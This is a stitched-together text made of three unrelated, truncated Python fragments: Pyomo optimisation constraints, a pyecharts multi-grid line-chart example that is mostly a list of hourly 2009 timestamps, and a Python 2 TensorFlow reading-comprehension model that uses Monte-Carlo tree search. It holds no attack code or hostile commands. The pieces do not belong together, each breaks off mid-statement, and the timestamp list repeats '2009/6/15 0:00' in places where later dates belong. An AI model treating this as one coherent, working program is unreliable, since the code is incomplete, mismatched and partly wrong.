m.e63 = Constraint(expr= m.x219 - m.x227 - m.x252 <= 0)
m.e64 = Constraint(expr= -m.x219 + m.x227 - m.x252 <= 0)
m.e65 = Constraint(expr= m.x213 - m.x229 - m.x253 <= 0)
m.e66 = Constraint(expr= -m.x213 + m.x229 - m.x253 <= 0)
m.e67 = Constraint(expr= m.x215 - m.x231 - m.x254 <= 0)
m.e68 = Constraint(expr= -m.x215 + m.x231 - m.x254 <= 0)
m.e69 = Constraint(expr= m.x217 - m.x233 - m.x255 <= 0)
m.e70 = Constraint(expr= -m.x217 + m.x233 - m.x255 <= 0)
m.e71 = Constraint(expr= m.x219 - m.x235 - m.x256 <= 0)
m.e72 = Constraint(expr= -m.x219 + m.x235 - m.x256 <= 0)
m.e73 = Constraint(expr= m.x221 - m.x229 - m.x257 <= 0)
m.e74 = Constraint(expr= -m.x221 + m.x229 - m.x257 <= 0)
m.e75 = Constraint(expr= m.x223 - m.x231 - m.x258 <= 0)
m.e76 = Constraint(expr= -m.x223 + m.x231 - m.x258 <= 0)
m.e77 = Constraint(expr= m.x225 - m.x233 - m.x259 <= 0)
m.e78 = Constraint(expr= -m.x225 + m.x233 - m.x259 <= 0)
m.e79 = Constraint(expr= m.x227 - m.x235 - m.x260 <= 0)
m.e80 = Constraint(expr= -m.x227 + m.x235 - m.x260 <= 0)
m.e81 = | |
import pyecharts.options as opts
from pyecharts.charts import Line, Grid
"""
From Echarts Gallery: https://www.echartsjs.com/examples/zh/editor.html?c=grid-multiple
"""
timeData = [
"2009/6/12 2:00",
"2009/6/12 3:00",
"2009/6/12 4:00",
"2009/6/12 5:00",
"2009/6/12 6:00",
"2009/6/12 7:00",
"2009/6/12 8:00",
"2009/6/12 9:00",
"2009/6/12 10:00",
"2009/6/12 11:00",
"2009/6/12 12:00",
"2009/6/12 13:00",
"2009/6/12 14:00",
"2009/6/12 15:00",
"2009/6/12 16:00",
"2009/6/12 17:00",
"2009/6/12 18:00",
"2009/6/12 19:00",
"2009/6/12 20:00",
"2009/6/12 21:00",
"2009/6/12 22:00",
"2009/6/12 23:00",
"2009/6/13 0:00",
"2009/6/13 1:00",
"2009/6/13 2:00",
"2009/6/13 3:00",
"2009/6/13 4:00",
"2009/6/13 5:00",
"2009/6/13 6:00",
"2009/6/13 7:00",
"2009/6/13 8:00",
"2009/6/13 9:00",
"2009/6/13 10:00",
"2009/6/13 11:00",
"2009/6/13 12:00",
"2009/6/13 13:00",
"2009/6/13 14:00",
"2009/6/13 15:00",
"2009/6/13 16:00",
"2009/6/13 17:00",
"2009/6/13 18:00",
"2009/6/13 19:00",
"2009/6/13 20:00",
"2009/6/13 21:00",
"2009/6/13 22:00",
"2009/6/13 23:00",
"2009/6/14 0:00",
"2009/6/14 1:00",
"2009/6/14 2:00",
"2009/6/14 3:00",
"2009/6/14 4:00",
"2009/6/14 5:00",
"2009/6/14 6:00",
"2009/6/14 7:00",
"2009/6/14 8:00",
"2009/6/14 9:00",
"2009/6/14 10:00",
"2009/6/14 11:00",
"2009/6/14 12:00",
"2009/6/14 13:00",
"2009/6/14 14:00",
"2009/6/14 15:00",
"2009/6/14 16:00",
"2009/6/14 17:00",
"2009/6/14 18:00",
"2009/6/14 19:00",
"2009/6/14 20:00",
"2009/6/14 21:00",
"2009/6/14 22:00",
"2009/6/14 23:00",
"2009/6/15 0:00",
"2009/6/15 1:00",
"2009/6/15 2:00",
"2009/6/15 3:00",
"2009/6/15 4:00",
"2009/6/15 5:00",
"2009/6/15 6:00",
"2009/6/15 7:00",
"2009/6/15 8:00",
"2009/6/15 9:00",
"2009/6/15 10:00",
"2009/6/15 11:00",
"2009/6/15 12:00",
"2009/6/15 13:00",
"2009/6/15 14:00",
"2009/6/15 15:00",
"2009/6/15 16:00",
"2009/6/15 17:00",
"2009/6/15 18:00",
"2009/6/15 19:00",
"2009/6/15 20:00",
"2009/6/15 21:00",
"2009/6/15 22:00",
"2009/6/15 23:00",
"2009/6/15 0:00",
"2009/6/16 1:00",
"2009/6/16 2:00",
"2009/6/16 3:00",
"2009/6/16 4:00",
"2009/6/16 5:00",
"2009/6/16 6:00",
"2009/6/16 7:00",
"2009/6/16 8:00",
"2009/6/16 9:00",
"2009/6/16 10:00",
"2009/6/16 11:00",
"2009/6/16 12:00",
"2009/6/16 13:00",
"2009/6/16 14:00",
"2009/6/16 15:00",
"2009/6/16 16:00",
"2009/6/16 17:00",
"2009/6/16 18:00",
"2009/6/16 19:00",
"2009/6/16 20:00",
"2009/6/16 21:00",
"2009/6/16 22:00",
"2009/6/16 23:00",
"2009/6/15 0:00",
"2009/6/17 1:00",
"2009/6/17 2:00",
"2009/6/17 3:00",
"2009/6/17 4:00",
"2009/6/17 5:00",
"2009/6/17 6:00",
"2009/6/17 7:00",
"2009/6/17 8:00",
"2009/6/17 9:00",
"2009/6/17 10:00",
"2009/6/17 11:00",
"2009/6/17 12:00",
"2009/6/17 13:00",
"2009/6/17 14:00",
"2009/6/17 15:00",
"2009/6/17 16:00",
"2009/6/17 17:00",
"2009/6/17 18:00",
"2009/6/17 19:00",
"2009/6/17 20:00",
"2009/6/17 21:00",
"2009/6/17 22:00",
"2009/6/17 23:00",
"2009/6/18 0:00",
"2009/6/18 1:00",
"2009/6/18 2:00",
"2009/6/18 3:00",
"2009/6/18 4:00",
"2009/6/18 5:00",
"2009/6/18 6:00",
"2009/6/18 7:00",
"2009/6/18 8:00",
"2009/6/18 9:00",
"2009/6/18 10:00",
"2009/6/18 11:00",
"2009/6/18 12:00",
"2009/6/18 13:00",
"2009/6/18 14:00",
"2009/6/18 15:00",
"2009/6/18 16:00",
"2009/6/18 17:00",
"2009/6/18 18:00",
"2009/6/18 19:00",
"2009/6/18 20:00",
"2009/6/18 21:00",
"2009/6/18 22:00",
"2009/6/18 23:00",
"2009/6/15 0:00",
"2009/6/19 1:00",
"2009/6/19 2:00",
"2009/6/19 3:00",
"2009/6/19 4:00",
"2009/6/19 5:00",
"2009/6/19 6:00",
"2009/6/19 7:00",
"2009/6/19 8:00",
"2009/6/19 9:00",
"2009/6/19 10:00",
"2009/6/19 11:00",
"2009/6/19 12:00",
"2009/6/19 13:00",
"2009/6/19 14:00",
"2009/6/19 15:00",
"2009/6/19 16:00",
"2009/6/19 17:00",
"2009/6/19 18:00",
"2009/6/19 19:00",
"2009/6/19 20:00",
"2009/6/19 21:00",
"2009/6/19 22:00",
"2009/6/19 23:00",
"2009/6/20 0:00",
"2009/6/20 1:00",
"2009/6/20 2:00",
"2009/6/20 3:00",
"2009/6/20 4:00",
"2009/6/20 5:00",
"2009/6/20 6:00",
"2009/6/20 7:00",
"2009/6/20 8:00",
"2009/6/20 9:00",
"2009/6/20 10:00",
"2009/6/20 11:00",
"2009/6/20 12:00",
"2009/6/20 13:00",
"2009/6/20 14:00",
"2009/6/20 15:00",
"2009/6/20 16:00",
"2009/6/20 17:00",
"2009/6/20 18:00",
"2009/6/20 19:00",
"2009/6/20 20:00",
"2009/6/20 21:00",
"2009/6/20 22:00",
"2009/6/20 23:00",
"2009/6/21 0:00",
"2009/6/21 1:00",
"2009/6/21 2:00",
"2009/6/21 3:00",
"2009/6/21 4:00",
"2009/6/21 5:00",
"2009/6/21 6:00",
"2009/6/21 7:00",
"2009/6/21 8:00",
"2009/6/21 9:00",
"2009/6/21 10:00",
"2009/6/21 11:00",
"2009/6/21 12:00",
"2009/6/21 13:00",
"2009/6/21 14:00",
"2009/6/21 15:00",
"2009/6/21 16:00",
"2009/6/21 17:00",
"2009/6/21 18:00",
"2009/6/21 19:00",
"2009/6/21 20:00",
"2009/6/21 21:00",
"2009/6/21 22:00",
"2009/6/21 23:00",
"2009/6/22 0:00",
"2009/6/22 1:00",
"2009/6/22 2:00",
"2009/6/22 3:00",
"2009/6/22 4:00",
"2009/6/22 5:00",
"2009/6/22 6:00",
"2009/6/22 7:00",
"2009/6/22 8:00",
"2009/6/22 9:00",
"2009/6/22 10:00",
"2009/6/22 11:00",
"2009/6/22 12:00",
"2009/6/22 13:00",
"2009/6/22 14:00",
"2009/6/22 15:00",
"2009/6/22 16:00",
"2009/6/22 17:00",
"2009/6/22 18:00",
"2009/6/22 19:00",
"2009/6/22 20:00",
"2009/6/22 21:00",
"2009/6/22 22:00",
"2009/6/22 23:00",
"2009/6/23 0:00",
"2009/6/23 1:00",
"2009/6/23 2:00",
"2009/6/23 3:00",
"2009/6/23 4:00",
"2009/6/23 5:00",
"2009/6/23 6:00",
"2009/6/23 7:00",
"2009/6/23 8:00",
"2009/6/23 9:00",
"2009/6/23 10:00",
"2009/6/23 11:00",
"2009/6/23 12:00",
"2009/6/23 13:00",
"2009/6/23 14:00",
"2009/6/23 15:00",
"2009/6/23 16:00",
"2009/6/23 17:00",
"2009/6/23 18:00",
"2009/6/23 19:00",
"2009/6/23 20:00",
"2009/6/23 21:00",
"2009/6/23 22:00",
"2009/6/23 23:00",
"2009/6/24 0:00",
"2009/6/24 1:00",
"2009/6/24 2:00",
"2009/6/24 3:00",
"2009/6/24 4:00",
"2009/6/24 5:00",
"2009/6/24 6:00",
"2009/6/24 7:00",
"2009/6/24 8:00",
"2009/6/24 9:00",
"2009/6/24 10:00",
"2009/6/24 11:00",
"2009/6/24 12:00",
"2009/6/24 13:00",
"2009/6/24 14:00",
"2009/6/24 15:00",
"2009/6/24 16:00",
"2009/6/24 17:00",
"2009/6/24 18:00",
"2009/6/24 19:00",
"2009/6/24 20:00",
"2009/6/24 21:00",
"2009/6/24 22:00",
"2009/6/24 23:00",
"2009/6/25 0:00",
"2009/6/25 1:00",
"2009/6/25 2:00",
"2009/6/25 3:00",
"2009/6/25 4:00",
"2009/6/25 5:00",
"2009/6/25 6:00",
"2009/6/25 7:00",
"2009/6/25 8:00",
"2009/6/25 9:00",
"2009/6/25 10:00",
"2009/6/25 11:00",
"2009/6/25 12:00",
"2009/6/25 13:00",
"2009/6/25 14:00",
"2009/6/25 15:00",
"2009/6/25 16:00",
"2009/6/25 17:00",
"2009/6/25 18:00",
"2009/6/25 19:00",
"2009/6/25 20:00",
"2009/6/25 21:00",
"2009/6/25 22:00",
"2009/6/25 23:00",
"2009/6/26 0:00",
"2009/6/26 1:00",
"2009/6/26 2:00",
"2009/6/26 3:00",
"2009/6/26 4:00",
"2009/6/26 5:00",
"2009/6/26 6:00",
"2009/6/26 7:00",
"2009/6/26 8:00",
"2009/6/26 9:00",
"2009/6/26 10:00",
"2009/6/26 11:00",
"2009/6/26 12:00",
"2009/6/26 13:00",
"2009/6/26 14:00",
"2009/6/26 15:00",
"2009/6/26 16:00",
"2009/6/26 17:00",
"2009/6/26 18:00",
"2009/6/26 19:00",
"2009/6/26 20:00",
"2009/6/26 21:00",
"2009/6/26 22:00",
"2009/6/26 23:00",
"2009/6/27 0:00",
"2009/6/27 1:00",
"2009/6/27 2:00",
"2009/6/27 3:00",
"2009/6/27 4:00",
"2009/6/27 5:00",
"2009/6/27 6:00",
"2009/6/27 7:00",
"2009/6/27 8:00",
"2009/6/27 9:00",
"2009/6/27 10:00",
"2009/6/27 11:00",
"2009/6/27 12:00",
"2009/6/27 13:00",
"2009/6/27 14:00",
"2009/6/27 15:00",
"2009/6/27 16:00",
"2009/6/27 17:00",
"2009/6/27 18:00",
"2009/6/27 19:00",
"2009/6/27 20:00",
"2009/6/27 21:00",
"2009/6/27 22:00",
"2009/6/27 23:00",
"2009/6/28 0:00",
"2009/6/28 1:00",
"2009/6/28 2:00",
"2009/6/28 3:00",
"2009/6/28 4:00",
"2009/6/28 5:00",
"2009/6/28 6:00",
"2009/6/28 7:00",
"2009/6/28 8:00",
"2009/6/28 9:00",
"2009/6/28 10:00",
"2009/6/28 11:00",
"2009/6/28 12:00",
"2009/6/28 13:00",
"2009/6/28 14:00",
"2009/6/28 15:00",
"2009/6/28 16:00",
"2009/6/28 17:00",
"2009/6/28 18:00",
"2009/6/28 19:00",
"2009/6/28 20:00",
"2009/6/28 21:00",
"2009/6/28 22:00",
"2009/6/28 23:00",
"2009/6/29 0:00",
"2009/6/29 1:00",
"2009/6/29 2:00",
"2009/6/29 3:00",
"2009/6/29 4:00",
"2009/6/29 5:00",
"2009/6/29 6:00",
"2009/6/29 7:00",
"2009/6/29 8:00",
"2009/6/29 9:00",
"2009/6/29 10:00",
"2009/6/29 11:00",
"2009/6/29 12:00",
"2009/6/29 13:00",
"2009/6/29 14:00",
"2009/6/29 15:00",
"2009/6/29 16:00",
"2009/6/29 17:00",
"2009/6/29 18:00",
"2009/6/29 19:00",
"2009/6/29 20:00",
"2009/6/29 21:00",
"2009/6/29 22:00",
"2009/6/29 23:00",
"2009/6/30 0:00",
"2009/6/30 1:00",
"2009/6/30 2:00",
"2009/6/30 3:00",
"2009/6/30 4:00",
"2009/6/30 5:00",
"2009/6/30 6:00",
"2009/6/30 7:00",
"2009/6/30 8:00",
"2009/6/30 9:00",
"2009/6/30 10:00",
"2009/6/30 11:00",
"2009/6/30 12:00",
"2009/6/30 13:00",
"2009/6/30 14:00",
"2009/6/30 15:00",
"2009/6/30 16:00",
"2009/6/30 17:00",
"2009/6/30 18:00",
"2009/6/30 19:00",
"2009/6/30 20:00",
"2009/6/30 21:00",
"2009/6/30 22:00",
"2009/6/30 23:00",
"2009/7/1 0:00",
"2009/7/1 1:00",
"2009/7/1 2:00",
"2009/7/1 3:00",
"2009/7/1 4:00",
"2009/7/1 5:00",
"2009/7/1 6:00",
"2009/7/1 7:00",
"2009/7/1 8:00",
"2009/7/1 9:00",
"2009/7/1 10:00",
"2009/7/1 11:00",
"2009/7/1 12:00",
"2009/7/1 13:00",
"2009/7/1 14:00",
"2009/7/1 15:00",
"2009/7/1 16:00",
"2009/7/1 17:00",
"2009/7/1 18:00",
"2009/7/1 19:00",
"2009/7/1 20:00",
"2009/7/1 21:00",
"2009/7/1 22:00",
"2009/7/1 23:00",
"2009/7/2 0:00",
"2009/7/2 1:00",
"2009/7/2 2:00",
"2009/7/2 3:00",
"2009/7/2 4:00",
"2009/7/2 5:00",
"2009/7/2 6:00",
"2009/7/2 7:00",
"2009/7/2 8:00",
"2009/7/2 9:00",
"2009/7/2 10:00",
"2009/7/2 11:00",
"2009/7/2 12:00",
"2009/7/2 13:00",
"2009/7/2 14:00",
"2009/7/2 15:00",
"2009/7/2 16:00",
"2009/7/2 17:00",
"2009/7/2 18:00",
"2009/7/2 19:00",
"2009/7/2 20:00",
"2009/7/2 21:00",
"2009/7/2 22:00",
"2009/7/2 23:00",
"2009/7/3 0:00",
"2009/7/3 1:00",
"2009/7/3 2:00",
"2009/7/3 3:00",
"2009/7/3 4:00",
"2009/7/3 5:00",
"2009/7/3 6:00",
"2009/7/3 7:00",
"2009/7/3 8:00",
"2009/7/3 9:00",
"2009/7/3 10:00",
"2009/7/3 11:00",
"2009/7/3 12:00",
"2009/7/3 13:00",
"2009/7/3 14:00",
"2009/7/3 15:00",
"2009/7/3 16:00",
"2009/7/3 17:00",
"2009/7/3 18:00",
"2009/7/3 19:00",
"2009/7/3 20:00",
"2009/7/3 21:00",
"2009/7/3 22:00",
"2009/7/3 23:00",
"2009/7/4 0:00",
"2009/7/4 1:00",
"2009/7/4 2:00",
"2009/7/4 3:00",
"2009/7/4 4:00",
"2009/7/4 5:00",
"2009/7/4 6:00",
"2009/7/4 7:00",
"2009/7/4 8:00",
"2009/7/4 9:00",
"2009/7/4 10:00",
"2009/7/4 11:00",
"2009/7/4 12:00",
"2009/7/4 13:00",
"2009/7/4 14:00",
"2009/7/4 15:00",
"2009/7/4 16:00",
"2009/7/4 17:00",
"2009/7/4 18:00",
"2009/7/4 19:00",
"2009/7/4 20:00",
"2009/7/4 21:00",
"2009/7/4 22:00",
"2009/7/4 23:00",
"2009/7/5 0:00",
"2009/7/5 1:00",
"2009/7/5 2:00",
"2009/7/5 3:00",
"2009/7/5 4:00",
"2009/7/5 5:00",
"2009/7/5 6:00",
"2009/7/5 7:00",
"2009/7/5 8:00",
"2009/7/5 9:00",
"2009/7/5 10:00",
"2009/7/5 11:00",
"2009/7/5 12:00",
"2009/7/5 13:00",
"2009/7/5 14:00",
"2009/7/5 15:00",
"2009/7/5 16:00",
"2009/7/5 17:00",
"2009/7/5 18:00",
"2009/7/5 19:00",
"2009/7/5 20:00",
"2009/7/5 21:00",
"2009/7/5 22:00",
"2009/7/5 23:00",
"2009/7/6 0:00",
"2009/7/6 1:00",
"2009/7/6 2:00",
"2009/7/6 3:00",
"2009/7/6 4:00",
"2009/7/6 5:00",
"2009/7/6 6:00",
"2009/7/6 7:00",
"2009/7/6 8:00",
"2009/7/6 9:00",
"2009/7/6 10:00",
"2009/7/6 11:00",
"2009/7/6 12:00",
"2009/7/6 13:00",
"2009/7/6 14:00",
"2009/7/6 15:00",
"2009/7/6 16:00",
"2009/7/6 17:00",
"2009/7/6 18:00",
"2009/7/6 19:00",
"2009/7/6 20:00",
"2009/7/6 21:00",
"2009/7/6 22:00",
"2009/7/6 23:00",
"2009/7/7 0:00",
"2009/7/7 1:00",
"2009/7/7 2:00",
"2009/7/7 3:00",
"2009/7/7 4:00",
"2009/7/7 5:00",
"2009/7/7 6:00",
"2009/7/7 7:00",
"2009/7/7 8:00",
"2009/7/7 9:00",
"2009/7/7 10:00",
"2009/7/7 11:00",
"2009/7/7 12:00",
"2009/7/7 13:00",
"2009/7/7 14:00",
"2009/7/7 15:00",
"2009/7/7 16:00",
"2009/7/7 17:00",
"2009/7/7 18:00",
"2009/7/7 19:00",
"2009/7/7 20:00",
"2009/7/7 21:00",
"2009/7/7 22:00",
"2009/7/7 23:00",
"2009/7/8 0:00",
"2009/7/8 1:00",
"2009/7/8 2:00",
"2009/7/8 3:00",
"2009/7/8 4:00",
"2009/7/8 5:00",
"2009/7/8 6:00",
"2009/7/8 7:00",
"2009/7/8 8:00",
"2009/7/8 9:00",
"2009/7/8 10:00",
"2009/7/8 | |
<gh_stars>1-10
# -*- coding:utf8 -*-
# ==============================================================================
# Copyright 2017 lizhaohui.com, Inc. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
This module implements the reading comprehension models based on:
Reinforcement Learning and Monte-Carlo Tree Search
Note that we use Pointer Network for the decoding stage of both models.
"""
import os
import time
import logging
import json
from mctree import search_tree
import numpy as np
import tensorflow as tf
from utils import compute_bleu_rouge
from utils import normalize
from layers.basic_rnn import rnn
from layers.match_layer import MatchLSTMLayer
from layers.match_layer import AttentionFlowMatchLayer
from layers.pointer_net import PointerNetDecoder
from pmctree import PSCHTree
class MCSTmodel(object):
"""
Implements the main reading comprehension model.
"""
def __init__(self, vocab, args):
# logging
self.args = args
self.logger = logging.getLogger("brc")
# basic config
self.algo = args.algo
self.hidden_size = args.hidden_size
self.optim_type = args.optim
self.learning_rate = args.learning_rate
self.weight_decay = args.weight_decay
self.use_dropout = args.dropout_keep_prob < 1
# length limit
self.max_p_num = args.max_p_num
self.max_p_len = args.max_p_len
self.max_q_len = args.max_q_len
#self.max_a_len = args.max_a_len
self.max_a_len = 20
#test paras
self.search_time = 3000
self.beta = 100.0
# the vocab
self.vocab = vocab
#self._build_graph()
def _build_graph(self):
"""
Builds the computation graph with Tensorflow
"""
# session info
sess_config = tf.ConfigProto()
sess_config.gpu_options.allow_growth = True
self.sess = tf.Session(config=sess_config)
start_t = time.time()
self._setup_placeholders()
self._embed()
self._encode()
self._initstate()
self._action_frist()
self._action()
self._compute_loss()
#param_num = sum([np.prod(self.sess.run(tf.shape(v))) for v in self.all_params])
#self.logger.info('There are {} parameters in the model'.format(param_num))
self.saver = tf.train.Saver()
self.sess.run(tf.global_variables_initializer())
self.logger.info('Time to build graph: {} s'.format(time.time() - start_t))
def _setup_placeholders(self):
"""
Placeholders
"""
self.p = tf.placeholder(tf.int32, [None, None])
self.q = tf.placeholder(tf.int32, [None, None])
self.p_length = tf.placeholder(tf.int32, [None])
self.q_length = tf.placeholder(tf.int32, [None])
self.start_label = tf.placeholder(tf.int32, [None])
self.end_label = tf.placeholder(tf.int32, [None])
self.dropout_keep_prob = tf.placeholder(tf.float32)
#test
self.p_words_id = tf.placeholder(tf.int32, [None])
self.candidate_id = tf.placeholder(tf.int32, [None])
#self.words = tf.placeholder(tf.float32, [None, None])
self.selected_id_list = tf.placeholder(tf.int32, [None])
self.policy = tf.placeholder(tf.float32, [1, None]) # policy
self.v = tf.placeholder(tf.float32, [1, 1]) # value
def _embed(self):
"""
The embedding layer, question and passage share embeddings
"""
#with tf.device('/cpu:0'), tf.variable_scope('word_embedding'):
with tf.variable_scope('word_embedding'):
self.word_embeddings = tf.get_variable(
'word_embeddings',
shape=(self.vocab.size(), self.vocab.embed_dim),
initializer=tf.constant_initializer(self.vocab.embeddings),
trainable=True
)
self.p_emb = tf.nn.embedding_lookup(self.word_embeddings, self.p)
self.q_emb = tf.nn.embedding_lookup(self.word_embeddings, self.q)
def _encode(self):
"""
Employs two Bi-LSTMs to encode passage and question separately
"""
with tf.variable_scope('passage_encoding'):
self.p_encodes, _ = rnn('bi-lstm', self.p_emb, self.p_length, self.hidden_size)
with tf.variable_scope('question_encoding'):
_, self.sep_q_encodes= rnn('bi-lstm', self.q_emb, self.q_length, self.hidden_size)
if self.use_dropout:
self.p_encodes = tf.nn.dropout(self.p_encodes, self.dropout_keep_prob)
self.sep_q_encodes = tf.nn.dropout(self.sep_q_encodes, self.dropout_keep_prob)
def _initstate(self):
self.V = tf.Variable(tf.random_uniform([self.hidden_size*2, self.hidden_size * 2], -1. / self.hidden_size,1. / self.hidden_size))
self.W = tf.Variable(tf.random_uniform([self.hidden_size * 2, 1], -1. / self.hidden_size, 1. / self.hidden_size))
self.W_b = tf.Variable(tf.random_uniform([1, 1], -1. / self.hidden_size, 1. / self.hidden_size))
self.V_c = tf.Variable(tf.random_uniform([self.hidden_size*2, self.hidden_size], -1. / self.hidden_size, 1. / self.hidden_size))
self.V_h = tf.Variable(tf.random_uniform([self.hidden_size*2, self.hidden_size], -1. / self.hidden_size, 1. / self.hidden_size))
self.q_state_c = tf.sigmoid(tf.matmul(self.sep_q_encodes, self.V_c))
self.q_state_h = tf.sigmoid(tf.matmul(self.sep_q_encodes, self.V_h))
self.q_state = tf.concat([self.q_state_c, self.q_state_h], 1)
self.words = tf.reshape(self.p_encodes,[-1,self.hidden_size*2])
self.words_list = tf.gather(self.words, self.p_words_id) # all words in a question doc
def _action_frist(self):
"""
select first word
"""
#self.candidate = tf.reshape(self.p_emb,[-1,self.hidden_size*2])
self.logits_first = tf.reshape(tf.matmul(tf.matmul(self.words_list, self.V), tf.transpose(self.q_state)), [-1])
self.prob_first = tf.nn.softmax(self.logits_first)
self.prob_id_first = tf.argmax(self.prob_first)
self.value_first = tf.sigmoid(tf.reshape(tf.matmul(self.q_state, self.W), [1, 1]) + self.W_b) # [1,1]
def _action(self):
"""
Employs Bi-LSTM again to fuse the context information after match layer
"""
self.candidate = tf.gather(self.words_list, self.candidate_id)
self.selected_list = tf.gather(self.words_list, self.selected_id_list)
self.input = tf.reshape(self.selected_list, [1, -1, self.hidden_size*2])
rnn_cell = tf.contrib.rnn.BasicLSTMCell(num_units=self.hidden_size, state_is_tuple=False)
_, self.states = tf.nn.dynamic_rnn(rnn_cell, self.input, initial_state=self.q_state, dtype=tf.float32) # [1, dim]
self.logits = tf.reshape(tf.matmul(tf.matmul(self.candidate, self.V), tf.transpose(self.states)), [-1])
self.prob = tf.nn.softmax(self.logits)
self.prob_id = tf.argmax(self.prob)
self.value = tf.sigmoid(tf.reshape(tf.matmul(self.states, self.W), [1, 1]) + self.W_b) # [1,1]
def value_function(self, words_list):
words_list = map(eval, words_list)
#print words_list
if len(words_list) == 0:
value_p = self.sess.run(self.value_first, feed_dict=self.feed_dict)
else:
feed_dict = dict({self.selected_id_list: words_list}.items() + self.feed_dict.items())
value_p = self.sess.run(self.value, feed_dict=feed_dict)
return value_p
def get_policy(self, words_list, l_passages):
max_id = float('-inf')
policy_c_id = []
words_list = map(eval, words_list)
for can in words_list:
max_id = max(can,max_id)
for idx in range(l_passages):
if idx > max_id:
policy_c_id.append(idx)
if len(words_list) == 0:
c_pred = self.sess.run(self.prob_first, feed_dict=self.feed_dict)
else:
feed_dict = dict({self.selected_id_list: words_list, self.candidate_id: policy_c_id}.items() + self.feed_dict.items())
c_pred = self.sess.run(self.prob, feed_dict=feed_dict)
return policy_c_id, c_pred
def _decode(self):
"""
Employs Pointer Network to get the the probs of each position
to be the start or end of the predicted answer.
Note that we concat the fuse_p_encodes for the passages in the same document.
And since the encodes of queries in the same document is same, we select the first one.
"""
with tf.variable_scope('same_question_concat'):
batch_size = tf.shape(self.start_label)[0]
concat_passage_encodes = tf.reshape(
self.fuse_p_encodes,
[batch_size, -1, 2 * self.hidden_size]
)
no_dup_question_encodes = tf.reshape(
self.sep_q_encodes,
[batch_size, -1, tf.shape(self.sep_q_encodes)[1], 2 * self.hidden_size]
)[0:, 0, 0:, 0:]
decoder = PointerNetDecoder(self.hidden_size)
self.start_probs, self.end_probs = decoder.decode(concat_passage_encodes,
no_dup_question_encodes)
def _compute_loss(self):
"""
The loss function
"""
self.loss_first = tf.contrib.losses.mean_squared_error(self.v, self.value_first) - tf.matmul(self.policy, tf.reshape(
tf.log(tf.clip_by_value(self.prob_first, 1e-30, 1.0)), [-1, 1]))
self.optimizer_first = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss_first)
self.loss = tf.contrib.losses.mean_squared_error(self.v, self.value) - tf.matmul(self.policy, tf.reshape(
tf.log(tf.clip_by_value(self.prob, 1e-30, 1.0)), [-1, 1]))
self.optimizer = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss)
self.all_params = tf.trainable_variables()
def _create_train_op(self):
"""
Selects the training algorithm and creates a train operation with it
"""
if self.optim_type == 'adagrad':
self.optimizer = tf.train.AdagradOptimizer(self.learning_rate)
elif self.optim_type == 'adam':
self.optimizer = tf.train.AdamOptimizer(self.learning_rate)
elif self.optim_type == 'rprop':
self.optimizer = tf.train.RMSPropOptimizer(self.learning_rate)
elif self.optim_type == 'sgd':
self.optimizer = tf.train.GradientDescentOptimizer(self.learning_rate)
else:
raise NotImplementedError('Unsupported optimizer: {}'.format(self.optim_type))
self.train_op = self.optimizer.minimize(self.loss)
def _train_epoch_new(self, pmct, train_batches, batch_size, dropout_keep_prob):
"""
Trains the model for a single epoch.
Args:
train_batches: iterable batch data for training
dropout_keep_prob: float value indicating dropout keep probability
"""
for bitx, batch in enumerate(train_batches, 1):
print '------ Batch Question: ' + str(bitx)
'''
feed_dict = {self.p: batch['passage_token_ids'],
self.q: [batch['question_token_ids']],
self.p_length: batch['passage_length'],
self.q_length: [batch['question_length']],
self.dropout_keep_prob: dropout_keep_prob}
'''
pred_answers = {}
#print str(ref_answers)
listSelectedSet = []
p_data = []
tree_batch = {
'tree_ids': batch['question_ids'],
'question_type': batch['question_types'],
'root_tokens': batch['question_token_ids'],
'q_length': batch['question_length'],
'candidates': batch['passage_token_ids'],
'p_length': batch['passage_length'],
'ref_answers': batch['ref_answers'],
'mcst_model': self
}
feed_dict = {}
pmct.feed_in_batch(tree_batch, 3, feed_dict)
loss = pmct.tree_search()
return loss
def _train_epoch(self, train_batches, dropout_keep_prob):
"""
Trains the model for a single epoch.
Args:
train_batches: iterable batch data for training
dropout_keep_prob: float value indicating dropout keep probability
"""
total_num, total_loss = 0, 0
log_every_n_batch, n_batch_loss = 3, 0
for bitx, batch in enumerate(train_batches, 1):
print '------ Batch Question: ' + str(bitx)
#print 'each passage len: '
#print batch['padded_p_len']
p_words_id = [] #all words id
p_words_list = [] #all words except padding
p_words_list_all = []
l_passages = 1 # include end_pad
n = 0
for l in batch['passage_length']:
l_passages += l
temp_id = [i + n * (int(batch['padded_p_len'])) for i in range(l)]
#print temp
temp_w = batch['passage_token_ids'][n][:l]
temp_all = batch['passage_token_ids'][n]
n += 1
p_words_id += temp_id
p_words_list += temp_w
p_words_list_all += temp_all
p_words_list.append(0)
self.end_pad = []
self.end_pad.append(p_words_id[-1] + 1)
p_words_id.append(p_words_id[-1] + 1)
#print 'end_pad: '
#print self.end_pad
#print p_words_list
#print p_words_id
#print len(p_words_list)
#print p_words_list_all
#print len(p_words_list_all)
self.max_a_len = min(self.max_a_len, l_passages)
self.feed_dict = {self.p: batch['passage_token_ids'],
self.q: [batch['question_token_ids'][0]],
self.p_length: batch['passage_length'],
self.q_length: [batch['question_length'][0]],
self.start_label: batch['start_id'],
self.end_label: batch['end_id'],
self.p_words_id: p_words_id,
self.dropout_keep_prob: dropout_keep_prob}
#print "question_length: " + str(batch['question_length'])
#print "passage_length: " + str(batch['passage_length'])
pred_answers, ref_answers = [], []
for sample in batch['raw_data']:
if 'answers' in sample:
ref_answers.append({'question_id': sample['question_id'],
'question_type': sample['question_type'],
'answers': sample['answers'],
'entity_answers': [[]],
'yesno_answers': []})
#print 'answers: '
#print str(sample['answers'])
#print 'ref_answers: '
#print ref_answers
listSelectedSet = []
p_data = []
start_node = 'question_'+ str(batch['question_ids'][0])
mcts_tree = search_tree(self, batch['question_ids'][0], self.max_a_len, l_passages, p_words_list, ref_answers, self.vocab)
#for t in xrange(3):
for t in xrange(self.max_a_len):
#print '-------------'+str(t)+'------------'
mcts_tree.search(start_node)
tmp_policy = mcts_tree.get_ppolicy(start_node)
#print 'tmp_policy.values(): '
#print tmp_policy.values()
#print 'sum(tmp_policy.values()): '
